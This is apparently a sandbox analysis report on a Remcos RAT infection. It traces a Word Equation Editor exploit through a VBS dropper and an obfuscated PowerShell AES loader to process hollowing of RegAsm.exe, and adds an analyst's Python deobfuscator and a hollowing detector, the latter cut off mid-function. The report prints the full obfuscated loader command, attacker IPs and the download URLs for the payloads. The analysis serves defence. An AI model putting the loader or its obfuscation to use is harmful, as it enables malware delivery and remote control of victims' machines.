                              Jul 29, 2024 16:15:12.347695112 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.348512888 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.436678886 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436717987 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436753035 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436801910 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.436878920 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436912060 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436933041 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.436944962 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436979055 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.436996937 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437069893 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437120914 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437123060 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437153101 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437185049 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437203884 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437216997 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437248945 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437267065 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437283039 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437314987 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437334061 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437349081 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437401056 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437578917 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437611103 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437643051 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437661886 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437674999 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437712908 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437732935 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437745094 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437777996 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437798023 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437809944 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437841892 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437861919 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.437874079 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437910080 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.437930107 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.438210011 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438242912 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438266039 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.438275099 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438309908 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438334942 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.438340902 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438374043 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438393116 CEST4916580192.168.2.22172.245.123.11
                              Jul 29, 2024 16:15:12.438405991 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438438892 CEST8049165172.245.123.11192.168.2.22
                              Jul 29, 2024 16:15:12.438457012 CEST4916580192.168.2.22172.245.123.11
                               Timestamp                              Source Port  Dest Port  Source IP     Dest IP
                               Jul 29, 2024 16:15:12.685087919 CEST   54562        53         192.168.2.22  8.8.8.8
                               Jul 29, 2024 16:15:12.695017099 CEST   53           54562      8.8.8.8       192.168.2.22
                               Jul 29, 2024 16:15:15.226424932 CEST   52917        53         192.168.2.22  8.8.8.8
                               Jul 29, 2024 16:15:15.236540079 CEST   53           52917      8.8.8.8       192.168.2.22

                               Timestamp                              Source IP     Dest IP  Trans ID  OP Code             Name                   Type            Class        DNS over HTTPS
                               Jul 29, 2024 16:15:12.685087919 CEST   192.168.2.22  8.8.8.8  0xb2ad    Standard query (0)  tochisglobal.ddns.net  A (IP address)  IN (0x0001)  false
                               Jul 29, 2024 16:15:15.226424932 CEST   192.168.2.22  8.8.8.8  0xe3d2    Standard query (0)  geoplugin.net          A (IP address)  IN (0x0001)  false

                               Timestamp                              Source IP  Dest IP       Trans ID  Reply Code    Name                   CName  Address         Type            Class        DNS over HTTPS
                               Jul 29, 2024 16:15:12.695017099 CEST   8.8.8.8    192.168.2.22  0xb2ad    No error (0)  tochisglobal.ddns.net  -      103.253.17.222  A (IP address)  IN (0x0001)  false
                               Jul 29, 2024 16:15:15.236540079 CEST   8.8.8.8    192.168.2.22  0xe3d2    No error (0)  geoplugin.net          -      178.237.33.50   A (IP address)  IN (0x0001)  false
                              • 172.245.123.11
                              • 198.46.176.133
                              • geoplugin.net
                               Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
                               0           192.168.2.22  49163        172.245.123.11  80                2644  C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                               Timestamp                              Bytes transferred  Direction  Data
                               Jul 29, 2024 16:15:04.061233044 CEST   339                OUT        GET /47/weseethesimplethingsalwaystoget.gIF HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                              Host: 172.245.123.11
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:04.599836111 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:04 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                              Last-Modified: Mon, 29 Jul 2024 05:52:19 GMT
                              ETag: "6550e-61e5c76cdc3cd"
                              Accept-Ranges: bytes
                              Content-Length: 414990
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/gif
                              Data Ascii: dim illaceradoEE illaceradoE = raninoanadar("L_HelpAlias_001_0_Message") & illaceradoE & _anadar("L_HelpAlias_002_0_Message") & illaceradoE & _anadar("L_HelpAlias_003_0_Message") & illaceradoE & _anadar("X_HelpAlias_004_0_Message") & illaceradoE & _anadar("X_HelpAlias_005_0_Message") & illaceradoE & _anadar("X_HelpAlias_006_0_Message") & illaceradoE & _anadar("X_HelpAlias_007_0_Message") & illaceradoE & _anadar("X_HelpAlias_008_0_Messag


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.22 | 49164 | 198.46.176.133 | 80 | 3076 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                              Timestamp | Bytes transferred | Direction | Data
                              Jul 29, 2024 16:15:07.941452026 CEST | 79 | OUT | GET /Upload/vbs.jpeg HTTP/1.1
                              Host: 198.46.176.133
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:08.442563057 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:08 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                              Last-Modified: Wed, 10 Jul 2024 11:19:54 GMT
                              ETag: "1d7285-61ce2d35c4b0c"
                              Accept-Ranges: bytes
                              Content-Length: 1929861
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: image/jpeg


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              2 | 192.168.2.22 | 49165 | 172.245.123.11 | 80 | 3076 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                              Timestamp | Bytes transferred | Direction | Data
                              Jul 29, 2024 16:15:11.326792002 CEST | 74 | OUT | GET /47/BEN.txt HTTP/1.1
                              Host: 172.245.123.11
                              Connection: Keep-Alive
                              Jul 29, 2024 16:15:11.903148890 CEST | 1236 | IN | HTTP/1.1 200 OK
                              Date: Mon, 29 Jul 2024 14:15:11 GMT
                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                              Last-Modified: Mon, 29 Jul 2024 05:43:50 GMT
                              ETag: "a1000-61e5c5878b9d1"
                              Accept-Ranges: bytes
                              Content-Length: 659456
                              Keep-Alive: timeout=5, max=100
                              Connection: Keep-Alive
                              Content-Type: text/plain


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              3 | 192.168.2.22 | 49167 | 178.237.33.50 | 80 | 3228 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                              Timestamp | Bytes transferred | Direction | Data
                              Jul 29, 2024 16:15:15.245279074 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                              Host: geoplugin.net
                              Cache-Control: no-cache
                              Jul 29, 2024 16:15:15.887590885 CEST | 1170 | IN | HTTP/1.1 200 OK
                              date: Mon, 29 Jul 2024 14:15:15 GMT
                              server: Apache
                              content-length: 962
                              content-type: application/json; charset=utf-8
                              cache-control: public, max-age=300
                              access-control-allow-origin: *
                              Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                              Target ID:0
                              Start time:10:14:59
                              Start date:29/07/2024
                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                              Imagebase:0x13f5f0000
                              File size:1'423'704 bytes
                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:10:15:00
                              Start date:29/07/2024
                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                              Imagebase:0x400000
                              File size:543'304 bytes
                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:10:15:04
                              Start date:29/07/2024
                              Path:C:\Windows\SysWOW64\wscript.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weseethesimplethingsalwaystog.vBS"
                              Imagebase:0x4a0000
                              File size:141'824 bytes
                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:6
                              Start time:10:15:05
                              Start date:29/07/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'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CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
                              Imagebase:0xc80000
                              File size:427'008 bytes
                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.373610773.00000000036E9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000006.00000002.373610773.0000000003B20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true
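
The command line recorded for this process is a three-layer string obfuscation wrapped around a small AES decryptor. Reading it off the capture: the outer literal is built from `'…'+'…'` fragments, then `-creplace` turns `e4j` into `'` and `AQM` into `|`; the result is itself a concatenated literal that `-replace` / `-creplace` turn `CnI` into `"` and `TMI` into `$`; the final text is the stage-1 script, which SHA-256-hashes the key string, uses the first 16 bytes of the base64 blob as IV, decrypts AES-256-CBC with zero padding, and hands the plaintext to `Invoke-Expression`. The invoker `&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')` resolves to `iex`. The following script is an added analyst example, not part of the Joe Sandbox report; `SAMPLE` is a constructed, shortened stand-in for the captured command line with the same tokens and layering (the real ciphertext is not reproduced), and every function name is this example's own.

```python
"""Peel the string-obfuscation layers of the PowerShell loader recorded above.

Added analyst example, not part of the Joe Sandbox report. SAMPLE is a
constructed, shortened stand-in for the captured -command argument: same
tokens (e4j, AQM, CnI, TMI), same layering, ciphertext not reproduced.
"""
import hashlib
import re

SAMPLE = (
    "(('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)"
    "TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;"
    "TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.CipherMode]::CBC;"
    "TMIaesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;"
    "TMIaesManaged.D'+'ispose('+');}"
    "TMIchave = CnI87355924191917571657221755980918CnIe4j+e4j;"
    "TMItextoCriptografadoBase64 = CnI<ciphertext not reproduced here>CnI;"
    "Invoke-Expressioe4j+e4jn TMItextoDescriptografado;e4j)"
    "-rEplACe ([CHar]67+[CHar]110+[CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)"
    "AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 "
    "-CREplacE([Char]65+[Char]81+[Char]77),[Char]124)"
    "|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')"
)

# -replace / -creplace with either a quoted token or a [Char]N+[Char]M... sum as
# the pattern and a [Char]N as the replacement. Case is ignored in the operator
# names because the loader mixes case freely.
REPLACE_RE = re.compile(
    r"-(c?)replace\s*\(?\s*((?:\[char\]\d+\+?)+|'[^']*')\s*\)?\s*,\s*\[char\](\d+)",
    re.IGNORECASE,
)


def decode_operand(operand):
    """'e4j' -> e4j ; [Char]65+[Char]81+[Char]77 -> AQM."""
    if operand.startswith("'"):
        return operand[1:-1]
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", operand, re.I))


def parse_replacements(tail):
    """Yield (case_sensitive, token, replacement) for each replace operator in order."""
    for m in REPLACE_RE.finditer(tail):
        yield (m.group(1) != "", decode_operand(m.group(2)), chr(int(m.group(3))))


def join_concat(text):
    """Collapse 'a'+'b' fragment concatenation into ab."""
    return text.replace("'+'", "")


def peel_layer(expr):
    """(('frag'+'frag') -replace X,Y ...) -> the decoded inner text, or None at the bottom."""
    s = join_concat(expr)
    if not s.lstrip().startswith("(("):
        return None
    # Once the joins are gone, every quote the payload needs is still encoded
    # (e4j), so the literal is exactly the first quoted span.
    start = s.index("'")
    end = s.index("'", start + 1)
    literal, tail = s[start + 1:end], s[end + 1:]
    for case_sensitive, token, repl in parse_replacements(tail):
        # PowerShell -replace is a regex; the tokens have no metacharacters, but
        # re.escape keeps the emulation honest. -creplace is case-sensitive.
        literal = re.sub(re.escape(token), lambda _m, r=repl: r, literal,
                         flags=0 if case_sensitive else re.IGNORECASE)
    return literal


def deobfuscate(command):
    """Return every decoded layer, outermost first; the last one is the stage-1 script."""
    layers = []
    while (inner := peel_layer(layers[-1] if layers else command)) is not None:
        layers.append(inner)
    return layers


def resolve_invoker(verbose_preference="SilentlyContinue"):
    """&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'' ): characters 1 and 3 of the
    default $VerbosePreference value plus 'x' spell the alias for Invoke-Expression."""
    return verbose_preference[1] + verbose_preference[3] + "x"


def loader_parameters(script):
    """Pull what the stage-1 script hard-codes. It hashes the key string with
    SHA-256 to obtain the AES-256 key, so the digest is what an offline AES tool
    needs (IV = first 16 bytes of the base64-decoded blob, zero padding)."""
    key_string = re.search(r'\$chave = "([^"]+)"', script).group(1)
    return {
        "key_string": key_string,
        "aes_key_hex": hashlib.sha256(key_string.encode("utf-8")).hexdigest(),
        "mode": re.search(r"CipherMode\]::(\w+)", script).group(1),
        "padding": re.search(r"PaddingMode\]::(\w+)", script).group(1),
    }


if __name__ == "__main__":
    layers = deobfuscate(SAMPLE)
    for i, layer in enumerate(layers, 1):
        print(f"--- layer {i} ---\n{layer}\n")
    print("invoker:", resolve_invoker())
    print(loader_parameters(layers[-1]))
```

Two practical notes. The stage-1 script prints the decrypted text with `Write-Host` before it calls `Invoke-Expression`, so re-running the captured command in an isolated VM with the final `Invoke-Expression` swapped for `Write-Output` dumps stage 2 without executing it; alternatively feed the base64 blob, the SHA-256 digest above and the first 16 bytes as IV to any AES-256-CBC tool. The peeler is strict about the shape it saw here (a `((` literal followed by replace operators); a loader that nests a different operator, or puts a literal quote inside the payload, would need the literal-extraction step adjusted.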

                              Target ID:8
                              Start time:10:15:12
                              Start date:29/07/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              Imagebase:0x1140000
                              File size:64'704 bytes
                              MD5 hash:8FE9545E9F72E460723F484C304314AD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                               • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879945414.0000000000DFE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.879647352.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false


                                Execution Graph

                                Execution Coverage:5%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:10.5%
                                Total number of Nodes:38
                                Total number of Limit Nodes:3
                                execution_graph 12327 2a7d08 12328 2a7d2f 12327->12328 12332 2a9669 12328->12332 12341 2aa0e0 12328->12341 12329 2a7e3a 12333 2a96ab 12332->12333 12334 2aa169 12333->12334 12335 2a8e48 WriteProcessMemory 12333->12335 12350 2a91e0 12333->12350 12354 2a8b00 12333->12354 12358 2a8af8 12333->12358 12362 2a8a08 12333->12362 12366 2a8a10 12333->12366 12334->12329 12335->12333 12343 2a9783 12341->12343 12342 2aa169 12342->12329 12343->12342 12344 2a8af8 Wow64SetThreadContext 12343->12344 12345 2a8b00 Wow64SetThreadContext 12343->12345 12346 2a8e48 WriteProcessMemory 12343->12346 12347 2a8a08 ResumeThread 12343->12347 12348 2a8a10 ResumeThread 12343->12348 12349 2a91e0 CreateProcessA 12343->12349 12344->12343 12345->12343 12346->12343 12347->12343 12348->12343 12349->12343 12351 2a9267 12350->12351 12351->12351 12352 2a9452 CreateProcessA 12351->12352 12353 2a94c5 12352->12353 12355 2a8b49 Wow64SetThreadContext 12354->12355 12357 2a8bc7 12355->12357 12357->12333 12359 2a8b01 Wow64SetThreadContext 12358->12359 12361 2a8bc7 12359->12361 12361->12333 12363 2a8a54 ResumeThread 12362->12363 12365 2a8aa6 12363->12365 12365->12333 12367 2a8a54 ResumeThread 12366->12367 12369 2a8aa6 12367->12369 12369->12333 12370 2a7ee0 12371 2a7e2e 12370->12371 12372 2a7e9e 12371->12372 12374 2a9669 6 API calls 12371->12374 12375 2aa0e0 6 API calls 12371->12375 12373 2a7e3a 12374->12373 12375->12373
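
The execution graph above is the process-hollowing chain in API form: code in the PowerShell process's non-image-backed region at 0x2A0000 reaches CreateProcessA (node 2a91e0), WriteProcessMemory (2a8e48), Wow64SetThreadContext (2a8af8/2a8b00) and ResumeThread (2a8a08/2a8a10) in turn, and the RegAsm.exe child launched with no arguments then carries the Remcos Yara hits at 0x400000. The detector below is an added example, not part of the Joe Sandbox report: it walks an API-monitor style trace and alerts only when one source process drives a suspended child through all four stages. `TRACE` is constructed to mimic that chain plus two benign launches; its field names are this example's own, and it assumes thread and process handles have already been resolved to the target PID, which a real monitor has to do from the handle table.

```python
"""Flag the process-hollowing API sequence recorded in the execution graph above.

Added detection example, not part of the Joe Sandbox report. TRACE is a
constructed API-monitor style log; handle-to-PID resolution is assumed done.
"""

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit that parks the new process

# Stages a hollowing loader walks through, in order. Wow64 and Nt* variants are
# folded onto the same stage: both processes in the report are 32-bit on a
# 64-bit host, which is why the graph shows Wow64SetThreadContext.
STAGES = ("CreateProcess", "WriteProcessMemory", "SetThreadContext", "ResumeThread")
STAGE_OF = {
    "CreateProcessA": "CreateProcess", "CreateProcessW": "CreateProcess",
    "CreateProcessInternalW": "CreateProcess", "NtCreateUserProcess": "CreateProcess",
    "WriteProcessMemory": "WriteProcessMemory", "NtWriteVirtualMemory": "WriteProcessMemory",
    "SetThreadContext": "SetThreadContext", "Wow64SetThreadContext": "SetThreadContext",
    "NtSetContextThread": "SetThreadContext",
    "ResumeThread": "ResumeThread", "NtResumeThread": "ResumeThread",
}

TRACE = [
    # Constructed: powershell.exe (pid 6) hollows a suspended RegAsm.exe (pid 8),
    # writing headers and then the image body before redirecting the thread.
    {"seq": 1, "pid": 6, "image": "powershell.exe", "api": "CreateProcessA", "target": 8,
     "target_cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"',
     "flags": CREATE_SUSPENDED},
    {"seq": 2, "pid": 6, "image": "powershell.exe", "api": "WriteProcessMemory", "target": 8,
     "addr": 0x400000, "size": 0x400},
    {"seq": 3, "pid": 6, "image": "powershell.exe", "api": "WriteProcessMemory", "target": 8,
     "addr": 0x401000, "size": 0x5A000},
    {"seq": 4, "pid": 6, "image": "powershell.exe", "api": "Wow64SetThreadContext", "target": 8},
    {"seq": 5, "pid": 6, "image": "powershell.exe", "api": "ResumeThread", "target": 8},
    # Constructed benign noise: a normal launch, and a debugger-style suspended
    # launch that is resumed without any memory write.
    {"seq": 6, "pid": 2, "image": "explorer.exe", "api": "CreateProcessW", "target": 9,
     "target_cmdline": r'"C:\Windows\notepad.exe" C:\notes.txt', "flags": 0},
    {"seq": 7, "pid": 3, "image": "windbg.exe", "api": "CreateProcessW", "target": 10,
     "target_cmdline": r'"C:\tools\target.exe" --verbose', "flags": CREATE_SUSPENDED},
    {"seq": 8, "pid": 3, "image": "windbg.exe", "api": "ResumeThread", "target": 10},
]


def split_cmdline(cmdline):
    """Split a Windows command line into (image path, argument string); the image
    may be double-quoted, as in the report's RegAsm.exe command line."""
    if cmdline.startswith('"'):
        image, _, args = cmdline[1:].partition('"')
    else:
        image, _, args = cmdline.partition(" ")
    return image, args.strip()


def summarise(key, events):
    """Build the alert record for one completed chain."""
    image, args = split_cmdline(events[0].get("target_cmdline", ""))
    return {
        "source_pid": key[0],
        "source_image": events[0]["image"],
        "target_pid": key[1],
        "target_image": image,
        "writes": sum(1 for e in events if STAGE_OF[e["api"]] == "WriteProcessMemory"),
        "bytes_written": sum(e.get("size", 0) for e in events
                             if STAGE_OF[e["api"]] == "WriteProcessMemory"),
        "first_seq": events[0]["seq"],
        "last_seq": events[-1]["seq"],
        # RegAsm.exe does nothing useful without an assembly path; a bare launch,
        # as in the report, is itself a hint that the image is only a host.
        "target_has_args": bool(args),
    }


def detect_hollowing(events):
    """Return one alert per (source pid, target pid) that walks STAGES in order,
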